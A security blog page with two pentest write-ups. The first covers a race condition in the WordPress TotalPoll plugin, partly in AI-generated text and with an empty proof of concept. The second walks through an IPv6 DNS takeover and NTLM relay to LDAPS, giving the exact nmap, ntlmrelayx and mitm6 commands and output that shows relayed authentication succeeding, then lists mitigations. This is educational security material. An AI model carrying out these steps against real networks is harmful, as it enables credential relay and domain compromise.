Monday, May 22, 2023

WordPress TotalPoll Plugin Race Condition vulnerability (Write Up + AI generated blog)

Howdy Readers!



A race condition vulnerability has been discovered in the popular WordPress TotalPoll plugin. The vulnerability allows attackers to generate votes for their favorite streamers by exploiting a race condition in the plugin's voting logic.

The vulnerability exists in the TotalPoll plugin's voting logic. When a user votes for a poll, the plugin calls a function to update the poll's vote count. However, the function does not properly synchronize access to the vote count, which can lead to a race condition.

A race condition occurs when two or more threads of execution try to access the same data at the same time. If the data is not properly synchronized, it can be possible for one thread to overwrite the changes made by another thread.

In the case of the TotalPoll plugin, the race condition can be exploited to generate multiple votes for a poll. This can be done by creating multiple threads that all try to vote for the same poll at the same time.

The vulnerability is particularly concerning because it can be used to manipulate the results of polls. For example, a streamer could use the vulnerability to generate votes for themselves in order to win a poll.

The TotalPoll plugin has been updated to fix the vulnerability. However, users who are running an older version of the plugin are still vulnerable.

To protect yourself from this vulnerability, you should update the TotalPoll plugin to the latest version. You can also disable the plugin if you do not need it.

Here are some additional tips for protecting yourself from race condition vulnerabilities:

  • Use a web application firewall (WAF) to block malicious traffic.
  • Keep your software up to date.

--Tools--
  • BurpSuite

--Proof of Concept--



Found this vulnerability 2 years ago while watching a stream on Twitch, The streamer announced she was nominated for a contest. So I checked the contest link and discovered the vulnerability after around 20-30 minutes of inspecting some of the website's features.


--Report Timeline--

Reported: May 12, 2021
First Response: May 12, 2021 (I'll need to check this with the team so we can decide whether we add "rate limitation" feature to the upcoming versions or not)


After reporting the issue, I didn't receive any updates from them.

I hope you find this article interesting and useful.

“Learn as if you will live forever, live like you will die tomorrow.”
— Mahatma Gandhi

Monday, May 08, 2023

IPv6 DNS Takeover via mitm6 (Write Up)

Howdy Readers!


If you're into network pentesting, I'm sure you're familiar with this type of vulnerability. This vulnerability is all about IPv6 and DNS. 


IPv6 is the latest version of the Internet Protocol, which is used to identify and communicate with devices on the internet. DNS or the Domain Name System is a service that translates human-readable domain names (like "google.com") into IP addresses (like "2xx.xx.xxx.xx2") that devices can use to connect to websites and other internet services.


So IPv6 DNS takeover via mitm6 is a technique used to intercept and redirect DNS requests made by IPv6-enabled devices on a network. "mitm6" stands for "man-in-the-middle-6", and refers to the fact that this attack involves intercepting and manipulating network traffic in order to carry out the DNS takeover.


An IPv6 DNS takeover through mitm6 assault begins with an attacker intercepting and manipulating network traffic with the mitm6 tool. Specifically, the attacker broadcasts bogus router advertising to IPv6-enabled devices on the network, tricking them into routing their traffic through the attacker's workstation.


Once the attacker has control of the DNS requests, they can utilize them to carry out a variety of attacks. For instance, they might divert traffic intended for a legitimate website to a phony version of the same site that is intended to steal sensitive data like login credentials. 


So below is the step by step procedure on how to execute the attack. (PS: This guide is from one of my internal network penetration test report so I redacted some sensitive information of the target.)


--Tools--

  • NMAP
  • NTLMRelayx from Impacket
  • mitm6

--Steps to Reproduce--


1. Let's determine the domain name of the target using NMAP (nmap -n -sV --script "ldap* and not brute" 1x.xx.xx.x1).

Sample Request:

Nmap scan report for 1x.xx.xx.x1
Host is up (0.0020s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT     STATE  SERVICE           VERSION
53/tcp   open   domain            Simple DNS Plus
88/tcp   open   kerberos-sec      Microsoft Windows Kerberos (server time: 2023-05-01 10:20:01Z)
113/tcp  closed ident
135/tcp  open   msrpc?
139/tcp  open   netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open   ldap              Microsoft Windows Active Directory LDAP (Domain: test.redacted.site, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=test,DC=redacted,DC=site
|       ldapServiceName: test.redacted.site:[email protected]
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: XXXX
|       supportedSASLMechanisms: XXX-XXXXXX
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       supportedLDAPPolicies: MaxPoolThreads
|       supportedLDAPPolicies: MaxPercentDirSyncRequests
|       supportedLDAPPolicies: MaxDatagramRecv
|       supportedLDAPPolicies: MaxReceiveBuffer
|       supportedLDAPPolicies: InitRecvTimeout
|       supportedLDAPPolicies: MaxConnections
|       supportedLDAPPolicies: MaxConnIdleTime
|       supportedLDAPPolicies: MaxPageSize

<--snip-->
So as you can see port 389 (LDAP) is open which means that our target is vulnerable to the attack. IPv6 DNS takeover is not tied to a specific port number.

As a result, even though the attack does not specifically target any one port, it is crucial to understand that it can still be executed on any port that an IPv6-enabled network uses for DNS requests and responses.

2. Run NTLMRelay using the following command (impacket-ntlmrelayx -6 -t ldaps://1x.xx.xx.xx -wh fakewpad.test.redacted.site -l lootme)

Sample Request:
impacket-ntlmrelayx -6 -t ldaps://1x.xx.xx.x1 -wh fakewpad.test.redacted.site -l lootme
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:1xx.xx.xx.1xx
[*] SMBD-Thread-6 (process_request_thread): Received connection from ::ffff:1xx.xx.xx.xx, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:1xx.xx.x.xx
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff: 1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED

<--snip-->
As you can we already received SUCCEED response from the NTLMRelay

3. Open another terminal and run mitm6 using the following command (mitm6 -d test.redacted.site)

Sample Request:
mitm6 -d test.redacted.site
:0: UserWarning: You do not have a working installation of the service_identity module: 'No module named 'service_identity''.  Please install it from <https://pypi.python.org/pypi/service_identity> and make sure all of its dependencies are satisfied.  Without the service_identity module, Twisted can perform only rudimentary TLS client hostname verification.  Many valid certificate/hostname mappings may be rejected.
Starting mitm6 using the following configuration:
Primary adapter: eth0 [00:xx:xx:xx:xx:xx]
IPv4 address: 1xx.xx.xx.xx
IPv6 address: fxxx::2xx:xxxx:xxxx:xxxx
DNS local search domain: test.redacted.site
DNS allowlist: test.redaceted.site
IPv6 address fxxx::2xxx:x is now assigned to mac=xx:xx:xx:xx:xx:xx host=TESTHOST. ipv4=
Sent spoofed reply for mgmt.test.redacted.site. to fxxx::xxx:xx

<--snip-->
4. After the successful attack, Open another terminal and then ls to the lootme folder. 
5. Check the files from the lootme folder.

lootme folder

6. Verify the vulnerability.



--Recommendations--
  • The safest way to prevent man-in-the-middle attacks using mitm6 is to block DHCPv6 traffic and incoming RA (router advertisements) in Windows Firewall Group Policy since disabling IPv6 completely may result in unwanted side effects on the network.
  • If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service.
  • LDAP and LDAPS relay mitigation is by enabling both LDAP signing and LDAP channel binding.
  • Consider Administrative Users to the Protected Users group or marking them as Account is sensitive and cannot be delegated will prevent any impersonation of that user via delegation.
--References--
  • https://docs.microsoft.com/en-us/archive/blogs/netro/arguments-against-disabling-ipv6
  • https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course

The vulnerability was rated as Critical in our pentest reports.

I hope you find this article interesting and useful.

"Always remember that you are absolutely unique. Just like everyone else."
–Margaret Mead